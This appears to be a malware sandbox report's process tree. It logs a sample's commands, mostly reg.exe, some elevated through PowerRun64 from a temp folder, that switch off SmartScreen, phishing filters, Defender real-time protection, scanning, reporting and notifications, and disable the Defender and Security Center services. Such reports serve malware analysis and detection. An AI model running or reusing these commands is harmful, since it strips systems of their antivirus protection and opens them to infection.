    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4532)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 5048)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 3584)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /f
    - Executes dropped EXE

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4252)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4400)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4816)
    reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /f
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\reg.exe (depth 7, PID 5064)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4648)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4264)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2996)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2084)
    reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\reg.exe (depth 7, PID 3144)
    reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\reg.exe (depth 7, PID 1204)
    reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 5040)
    reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4080)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 944)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4500)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 3028)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2464)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4844)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 3840)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f
C:\Windows\SysWOW64\reg.exe (depth 7, PID 4600)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4532)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f
    - Executes dropped EXE

C:\Windows\SysWOW64\reg.exe (depth 7, PID 5036)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4464)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 5048)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4288)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender Real-time Protection settings

C:\Windows\SysWOW64\reg.exe (depth 7, PID 3904)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2252)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f
    - Executes dropped EXE

C:\Windows\SysWOW64\reg.exe (depth 7, PID 508)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Remediation" /v "Scan_ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4192)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "AdditionalActionTimeOut" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4140)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f
    - Modifies security service
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2032)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f
    - Executes dropped EXE
    - Modifies data under HKEY_USERS

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2996)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f
    - Modifies security service
    - Executes dropped EXE

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4908)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4552)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4080)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4500)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 1420)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2592)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRemovableDriveScanning" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2492)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableRestorePoint" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 312)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningMappedNetworkDrivesForFullScan" /t reg_DWORD /d "1" /f
    - Executes dropped EXE

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2940)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "DisableScanningNetworkFiles" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2696)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "PurgeItemsAfterDelay" /t reg_DWORD /d 0 /f
    - Executes dropped EXE

C:\Windows\SysWOW64\reg.exe (depth 7, PID 488)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleDay" /t reg_DWORD /d 8 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 3188)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4956)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanOnlyIfIdle" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 508)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Scan" /v "ScanParameters" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4552)
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" /v "FirstAuGracePeriod" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2464)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "DisableUpdateOnStartupWithoutEngine" /t reg_DWORD /d 1 /f
    - Modifies security service

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4560)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleDay" /t reg_DWORD /d 8 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2448)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "ScheduleTime" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4552)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Signature Updates" /v "SignatureUpdateCatchupInterval" /t reg_DWORD /d 0 /f
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken

C:\Windows\SysWOW64\reg.exe (depth 7, PID 5060)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControl" /t reg_SZ /d "Anywhere" /f
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4152)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SmartScreen" /v "ConfigureAppInstallControlEnabled" /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 3200)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t reg_DWORD /d "1" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4992)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t reg_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 3028)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReportingLocation" /t reg_MULTI_SZ /d "0" /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 3840)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t reg_DWORD /d "2" /f
    - Executes dropped EXE

C:\Windows\SysWOW64\reg.exe (depth 7, PID 508)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "LocalSettingOverrideSpynetReporting" /t reg_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe (depth 7, PID 2700)
    reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Systray" /v "HideSystray" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender notification settings

C:\Windows\SysWOW64\reg.exe (depth 7, PID 944)
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender notification settings

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4064)
    reg add "HKLM\SOFTWARE\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f
    - Modifies Windows Defender notification settings

C:\Windows\SysWOW64\reg.exe (depth 7, PID 4500)
    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /t reg_BINARY /d "030000000000000000000000" /f
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 7, PID 4152)
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 8, PID 5264)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 9, PID 5780)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 5984)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 7, PID 5404)
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 8, PID 5808)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 9, PID 6036)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f
    - Modifies data under HKEY_USERS

C:\Windows\System32\reg.exe (depth 10, PID 5168)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 7, PID 5884)
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 8, PID 6044)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 9, PID 5252)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 5480)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 7, PID 6116)
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 8, PID 5048)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 9, PID 5588)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 5760)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 7, PID 5364)
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 8, PID 5600)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 9, PID 5800)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 5792)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 7, PID 5664)
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 8, PID 5432)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 9, PID 6020)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 5220)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\WinDefend" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 7, PID 5932)
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 8, PID 5828)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 9, PID 5260)
    "C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Windows\System32\reg.exe (depth 10, PID 5508)
    "C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\wscsvc" /v "Start" /t reg_DWORD /d "4" /f

C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe (depth 7, PID 6100)
    PowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5168
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5488
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\ControlSet001\Services\SecurityHealthService" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5724
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5376
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:4152
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5344
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\Sense" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5428
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5628
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5776
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:6016
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdBoot" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5164
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5856
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f8⤵
- Modifies data under HKEY_USERS
PID:5780 -
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:6060
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdFilter" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:3200
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:5948
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:6112
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5300
-
C:\Windows\System32\reg.exe"C:\Windows\System32\reg.exe" add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisDrv" /v "Start" /t reg_DWORD /d "4" /f10⤵PID:5360
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exePowerRun64 /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f7⤵PID:6120
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f8⤵PID:5216
-
C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe"C:\Users\Admin\AppData\Local\Temp\nsx582E.tmp\PowerRun64.exe" /TI/ /SW:0 C:\Windows\System32\reg.exe add "HKLM\SYSTEM\CurrentControlSet\Services\WdNisSvc" /v "Start" /t reg_DWORD /d "4" /f9⤵PID:5268
-
